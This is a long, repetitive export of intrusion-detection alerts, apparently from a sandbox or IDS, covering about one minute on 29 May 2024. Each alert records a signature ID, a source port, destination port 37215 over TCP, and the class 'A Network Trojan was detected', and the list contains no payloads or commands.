                Timestamp:05/29/24-15:16:14.664184
                SID:2829579
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083573
                SID:2835222
                Source Port:33600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180323
                SID:2829579
                Source Port:33106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714135
                SID:2835222
                Source Port:45528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585125
                SID:2829579
                Source Port:53142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730439
                SID:2829579
                Source Port:53070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778192
                SID:2829579
                Source Port:47932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264928
                SID:2829579
                Source Port:47292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179787
                SID:2835222
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763065
                SID:2829579
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221505
                SID:2835222
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913765
                SID:2829579
                Source Port:53134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075838
                SID:2835222
                Source Port:56970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895722
                SID:2835222
                Source Port:34456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908217
                SID:2835222
                Source Port:48566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785960
                SID:2829579
                Source Port:36440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361804
                SID:2829579
                Source Port:46192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968557
                SID:2835222
                Source Port:52190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013252
                SID:2829579
                Source Port:40840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267742
                SID:2835222
                Source Port:33602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948780
                SID:2835222
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816998
                SID:2829579
                Source Port:38220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854509
                SID:2829579
                Source Port:51794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014586
                SID:2829579
                Source Port:47974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826218
                SID:2829579
                Source Port:39414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947214
                SID:2835222
                Source Port:41520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802362
                SID:2835222
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287752
                SID:2829579
                Source Port:52512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173373
                SID:2835222
                Source Port:38906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154974
                SID:2835222
                Source Port:54494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716248
                SID:2829579
                Source Port:45004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764192
                SID:2835222
                Source Port:46184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210012
                SID:2835222
                Source Port:43990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567510
                SID:2829579
                Source Port:56472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859240
                SID:2835222
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321477
                SID:2835222
                Source Port:32868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335798
                SID:2829579
                Source Port:50044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959170
                SID:2829579
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517254
                SID:2829579
                Source Port:54630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531361
                SID:2829579
                Source Port:55048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166338
                SID:2829579
                Source Port:47042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242935
                SID:2835222
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285688
                SID:2835222
                Source Port:38276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943959
                SID:2829579
                Source Port:33744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508172
                SID:2829579
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878725
                SID:2829579
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940086
                SID:2835222
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011045
                SID:2829579
                Source Port:46214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136858
                SID:2835222
                Source Port:58410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026512
                SID:2829579
                Source Port:37738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534829
                SID:2835222
                Source Port:50908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241891
                SID:2835222
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262423
                SID:2829579
                Source Port:34256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652076
                SID:2829579
                Source Port:39310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162254
                SID:2835222
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914882
                SID:2829579
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655264
                SID:2835222
                Source Port:57518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180508
                SID:2829579
                Source Port:53188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165519
                SID:2835222
                Source Port:60834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475172
                SID:2829579
                Source Port:45872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279476
                SID:2835222
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279275
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985949
                SID:2835222
                Source Port:50362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444474
                SID:2835222
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220572
                SID:2835222
                Source Port:33254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281190
                SID:2829579
                Source Port:43192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763257
                SID:2835222
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555532
                SID:2835222
                Source Port:52622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218075
                SID:2829579
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170453
                SID:2835222
                Source Port:55164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520590
                SID:2835222
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681858
                SID:2829579
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473538
                SID:2835222
                Source Port:37304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726642
                SID:2835222
                Source Port:53380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675241
                SID:2835222
                Source Port:57940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727237
                SID:2829579
                Source Port:55766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842106
                SID:2835222
                Source Port:35062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538372
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380792
                SID:2835222
                Source Port:40894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428267
                SID:2835222
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740408
                SID:2829579
                Source Port:35240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655898
                SID:2829579
                Source Port:52964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915784
                SID:2835222
                Source Port:46626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917683
                SID:2829579
                Source Port:33368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840752
                SID:2835222
                Source Port:38034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890765
                SID:2829579
                Source Port:55610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617458
                SID:2835222
                Source Port:45958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228211
                SID:2835222
                Source Port:55122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282062
                SID:2835222
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652008
                SID:2829579
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845219
                SID:2829579
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982504
                SID:2829579
                Source Port:43630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315811
                SID:2829579
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320449
                SID:2829579
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591037
                SID:2829579
                Source Port:50672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725513
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022556
                SID:2829579
                Source Port:51384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136823
                SID:2835222
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612359
                SID:2835222
                Source Port:42798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510223
                SID:2835222
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869998
                SID:2829579
                Source Port:47668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228333
                SID:2829579
                Source Port:51440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663193
                SID:2835222
                Source Port:45168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862931
                SID:2835222
                Source Port:39482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179928
                SID:2829579
                Source Port:58554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332389
                SID:2835222
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901177
                SID:2835222
                Source Port:40406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815573
                SID:2835222
                Source Port:54272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660303
                SID:2829579
                Source Port:47166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128535
                SID:2835222
                Source Port:55384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135998
                SID:2829579
                Source Port:43748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910648
                SID:2835222
                Source Port:53212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674957
                SID:2829579
                Source Port:48906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727298
                SID:2835222
                Source Port:42516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721673
                SID:2835222
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831332
                SID:2835222
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161336
                SID:2829579
                Source Port:60392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584541
                SID:2835222
                Source Port:57184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225510
                SID:2835222
                Source Port:43446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779520
                SID:2835222
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652189
                SID:2829579
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765245
                SID:2829579
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279213
                SID:2829579
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770769
                SID:2829579
                Source Port:40612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420230
                SID:2829579
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438521
                SID:2829579
                Source Port:35032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421878
                SID:2829579
                Source Port:59460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282019
                SID:2835222
                Source Port:57106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318733
                SID:2829579
                Source Port:33272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472302
                SID:2829579
                Source Port:48452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965451
                SID:2835222
                Source Port:49946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659854
                SID:2835222
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795865
                SID:2835222
                Source Port:56438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782244
                SID:2829579
                Source Port:46046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670857
                SID:2829579
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908192
                SID:2829579
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933176
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.661001
                SID:2829579
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944551
                SID:2829579
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101672
                SID:2829579
                Source Port:54912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944613
                SID:2835222
                Source Port:39944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113902
                SID:2829579
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853904
                SID:2829579
                Source Port:45524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715031
                SID:2829579
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373801
                SID:2829579
                Source Port:34152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416524
                SID:2835222
                Source Port:35580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457862
                SID:2829579
                Source Port:35534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742680
                SID:2835222
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675399
                SID:2829579
                Source Port:37116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907168
                SID:2829579
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257263
                SID:2835222
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919937
                SID:2835222
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075217
                SID:2829579
                Source Port:60766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917054
                SID:2835222
                Source Port:59322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136111
                SID:2829579
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463957
                SID:2829579
                Source Port:47602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169087
                SID:2835222
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230972
                SID:2829579
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593501
                SID:2829579
                Source Port:52890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779887
                SID:2829579
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739023
                SID:2835222
                Source Port:53656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715621
                SID:2829579
                Source Port:54448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139925
                SID:2829579
                Source Port:46860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688234
                SID:2829579
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210830
                SID:2829579
                Source Port:40164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852438
                SID:2835222
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985973
                SID:2829579
                Source Port:58426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639640
                SID:2835222
                Source Port:47696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218207
                SID:2829579
                Source Port:53370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675327
                SID:2829579
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359498
                SID:2829579
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738357
                SID:2829579
                Source Port:42484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902817
                SID:2829579
                Source Port:35560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510959
                SID:2829579
                Source Port:50130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572236
                SID:2835222
                Source Port:36802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273690
                SID:2829579
                Source Port:45832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531498
                SID:2829579
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001366
                SID:2829579
                Source Port:41590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728546
                SID:2829579
                Source Port:43654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442095
                SID:2835222
                Source Port:41126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816568
                SID:2835222
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223410
                SID:2829579
                Source Port:46098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713203
                SID:2835222
                Source Port:60804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919547
                SID:2829579
                Source Port:33518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784839
                SID:2829579
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915714
                SID:2835222
                Source Port:42970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846426
                SID:2835222
                Source Port:54456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731643
                SID:2835222
                Source Port:38594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735833
                SID:2829579
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728298
                SID:2829579
                Source Port:33548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622980
                SID:2829579
                Source Port:37680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863007
                SID:2835222
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821251
                SID:2835222
                Source Port:33886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969673
                SID:2835222
                Source Port:42366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689588
                SID:2835222
                Source Port:35894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654284
                SID:2829579
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782564
                SID:2829579
                Source Port:55598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615005
